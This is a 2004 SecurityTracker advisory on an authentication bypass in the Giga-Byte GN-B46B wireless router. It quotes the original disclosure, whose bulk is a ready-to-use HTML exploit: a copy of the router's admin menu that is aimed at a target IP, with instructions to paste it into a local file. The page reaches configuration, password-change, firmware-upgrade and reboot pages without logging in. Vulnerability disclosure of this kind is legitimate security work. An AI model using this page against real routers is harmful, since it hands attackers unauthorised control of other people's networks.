Giga-Byte Technology Router Authentication Flaw Lets Remote Users Access the Device
|
|
SecurityTracker Alert ID: 1009196 |
|
SecurityTracker URL: http://securitytracker.com/id/1009196
|
|
CVE Reference:
CAN-2004-0328
(Links to External Site)
|
Updated: Mar 23 2004
|
Original Entry Date: Feb 24 2004
|
Impact:
User access via network
|
Exploit Included: Yes
|
Version(s): Model GN-B46B; Firmware Version 1.003.00
|
Description:
Rafel Ivgi (The-Insider) reported an authentication vulnerability in the GN-B46B broadband wireless router from Giga-Byte Technology. A remote user can gain access to the device.
It is reported that a remote user can host a copy of the router's HTML menu locally on the remote user's system. Then, the remote user can load the HTML and use the embedded links to access the device without having to authenticate.
A demonstration exploit menu is provided in the Source Message.
|
Impact:
A remote user can access the device without having to authenticate to the device.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.giga-byte.com/Communication/Products/Products_Wireless_GN-B46B.htm (Links to External Site)
|
Cause:
Authentication error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 24 Feb 2004 16:44:03 +0200
Subject: Gigabyte Broadband Router - Multiple Vulnerabilities
|
#######################################################################
Device: Gigabyte Broadband Router - Multiple
Vulnerabilities
Vendors: http://www.giga-byte.com
Versions: Gn-B46B
Firmware Version: 1.003.00
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 18 Feb 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bugs
3) The Code
#######################################################################
===============
1) Introduction
===============
Gigabyte Gn-B46B is a 2.4Ghz Wireless Broadband Router.
Upon connection to the router a basic authorization is required.
Product details:
http://www.giga-byte.com/Communication/Products/Products_Wireless_GN-B46B.ht
m
#######################################################################
======
2) Bug
======
This bug is an amazing Authorization Bypass, almost unexplained. The server
protects all its
files with "Basic Authorization". The Authorization cannot be bypassed in
any other way
except of requesting the files on the router from the html menu of the
router. The problem is that
this protection should work only when the html menu of the router is on the
router itself.
However if an attacker will use the router's menu from a local html, it will
bypass the authorization
and the attacker will be logged in. Truely amazing, exceptional.
#######################################################################
===========
3) The Code
===========
Just copy this to a ".html" file and replace <host> with the target's IP.
------------------------------------ Cut
Here --------------------------------------
<html>htdocs
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="expires" CONTENT="0">
<STYLE> #foldheader {CURSOR: hand}</STYLE>
<base href="http://<host>">
<script language="javascript">
<!--
var lastIndex=-1;
function change(){
if (event.srcElement.id=="foldheader") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+2]
if (nested.style.display=="none") {
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+2;
}
else {
lastIndex=-1;
nested.style.display="none"
}
}
if (event.srcElement.id=="foldimage") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+1]
if (nested.style.display=="none") {
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+1;
}
else {
lastIndex=-1;
nested.style.display="none"
}
}
}
window.self.document.onclick=change
if(document.images){
image1off=new Image
image1off.src="../picture/button_setup.gif"
image1on=new Image
image1on.src="../picture/button_setup_over.gif"
image2off=new Image
image2off.src="../picture/button_status.gif"
image2on=new Image
image2on.src="../picture/button_status_over.gif"
image3off=new Image
image3off.src="../picture/button_logout.gif"
image3on=new Image
image3on.src="../picture/button_logout_over.gif"
}
function imgOn(imgName){
if(document.images){
document[imgName].src=eval(imgName+"on.src")
}
}
function imgOff(imgName){
if(document.images){
document[imgName].src=eval(imgName+"off.src")
}
}
function MoveOn(which_log, item)
{
dd = new Date();
time = dd.getTime();
offset = dd.getTimezoneOffset();
item.href = '../cgi-bin/SetData.cgi?LogMenu' + which_log + '\+' +
Math.round(time/1000) + '\+' + offset;
}
//-->
</script>
<title>English</title>
<style type="text/css">
body{font-family: Arial,verdana,Helvetica; font-size: 10pt; line-height:
18px;background:#ffffff;}
.blueBg {background:#79A7EF;}
.blackBg {background:#000000;}
.grayBg {background:#EEEEEE;}
.lightBlueBg
{background:#9FBEEE;font-size:10pt;color:#000000;font-weight:bold;}
.lightBlackBg
{background:#000000;font-size:10pt;color:#FFFFFF;font-weight:bold;}
.whiteBg {background:#ffffff;}
.redText {color:#FF9000;}
.tagText {color:#FF9000;font-weight:bold;background:#ffffff;}
.blueText {color: rgb(0,0,0);}
.orangeText {color:#FF9000;font-weight:bold;}
.heading{color:#000000;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.heading1{color:#3333CC;font-size:10pt;background:#Eeeeee;}
.heading2{color:#3333CC;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.headingLink{font-size:10pt;font-weight:bold;color:#ffffff;}
.title{color:#ffffff;font-size:20pt;font-weight:bold;background:#9FBEEE;}
.titleSub{color:#3333CC;font-size:15pt;font-weight:bold;background:#ffffff;}
.titleSub1{color:#000000;font-size:13pt;font-weight:bold;background:#ffffff;
}
.buttonText{background-color:
rgb(255,144,0);color:#ffffff;font-weight:bold;}
A:link {color:#FFFFFF; font-style: normal; cursor:
hand;text-decoration:none;}
A:visited {color:rgb(255,255,255); font-style:
normal;text-decoration:none;}
A:active {color:#9FBEEE; font-style: normal;text-decoration:none;}
A:hover {color:#9FBEEE; font-style:bold;text-decoration:underline;}
</style>
</head>
<BODY style="background-color: #000000">
<center>
<table cellpadding=0 cellspacing=0 border=0 width=180 class="blackBg">
<tr>
<td height="25" colspan="3"><img src="../picture/spacer.gif" width="1"
height="1"></td>
</tr>
<tr>
<td colspan="3"><a href="/htdocs/BasicLANSetup.htm" target=main
onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')">
<img src="../picture/button_setup.gif" border="0" name="image1"
width="184" height="23"></a></td>
</tr>
<!--
<tr>
<td colspan="3"><a href="/htdocs/status.htm" target=main
onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
-->
<tr>
<td colspan="3"><a href="../cgi-bin/SetData.cgi?ShowStatus"
href="status.htm" target=main onMouseover="imgOn('image2')";
onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
<tr>
<td colspan="3"><a href="/htdocs/Logout.htm" target=_top
onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')">
<img src="../picture/button_logout.gif" border="0" name="image3"
width="184" height="29"></a></td>
</tr>
<tr>
<td colspan="3" height="8"><img src="../picture/spacer.gif" width="1"
height="1"></td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_advancedSetup.gif" border="0" width="174"
height="34"></td>
</tr>
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"></td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Network Configuration
<table id="network" border="0">
<tr class="headingLink"><td> <a
href="NetworkSetup3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> LAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> WAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> WAN Setting</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Wireless Configuration
<table id="wireless" border="0">
<tr class="headingLink"><td> <a
href="WirelessSetup2B.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> 802.11b</a></td></tr>
<tr class="headingLink"><td> <a
href="MACcontrol11b.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> MAC Access Control</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/StaticRouting.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Static Routing Table</a></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Virtual Server
<table id="virtual" border="0">
<tr class="headingLink"><td> <a
href="VirtualServer1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> DMZ</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> PPPoE/DHCP/Static</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> PPPoE Unnumber</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Firewall Rule
<table id="firewall" border="0">
<tr class="headingLink"><td> <a
href="Firewall1.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7"
height="7"> Security</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall3.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7"> VPN Pass
Through</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall2.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7"> Static
Rule</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/DNSReplay.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> DNS Replay</a></td>
</tr>
<tr>
<td height="7"><img src="../picture/spacer.gif" width="1" height="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"></td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_management.gif" border="0" width="174"
height="31"></td>
</tr>
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"></td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td>
</tr>
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?ShowPPPMonitor"
target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> PPP Monitor</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Reboot.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Reboot</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Initialization.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Initialization</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangePassword.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change Password</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangeMAC.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change WAN MAC</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/UpgradeFirmware.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Upgrade Firmware</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/BackUpRestore.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> BackUp/Restore</a></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Log Information
<table id="log" border="0">
<tr class="headingLink"><td> <a href="#"
target=main onclick="MoveOn('firelog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> Firewall Log</a></td></tr>
<tr class="headingLink"><td> <a href="#"
target=main onclick="MoveOn('connlog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> WAN Connection</a></td></tr>
<tr class="headingLink"><td> <a href="#"
target=main onclick="MoveOn('upnplog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="7"
height="7"> UPnP Log</a></td></tr>
</table>
</td>
</tr>
<!--
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?LogMenufirelog+0+0"
target=main onclick="MoveOn('firelog')">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Log Information</a></td>
</tr>
-->
<tr>
<td valign="top"><a href="/htdocs/Save.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Save Maintenance</a></td>
</tr>
<tr>
<td valign="top"><a href="../others/Help.English.htm" target="_blank">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Help</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Ping.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Ping</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/About.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> About</a></td>
</tr>
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" height="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"></td>
</tr>
<tr>
<!--<td colspan="3"><img src="../picture/banner_bottom.gif" width="184"
height="38"></td>-->
</tr>
<tr>
<td colspan="3" height="20"><img src="../picture/spacer.gif" width="1"
height="1"></td>
</tr>
</table>
</center>
</body>
</html>
<script language="javascript">
if(navigator.appName == "Microsoft Internet Explorer" &&
parseInt(navigator.appVersion) >= 4)
{
network.style.display = "none" ;
wireless.style.display = "none" ;
virtual.style.display = "none" ;
firewall.style.display = "none" ;
log.style.display = "none" ;
}
</script>
------------------------------------ Cut
Here --------------------------------------
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
|
|
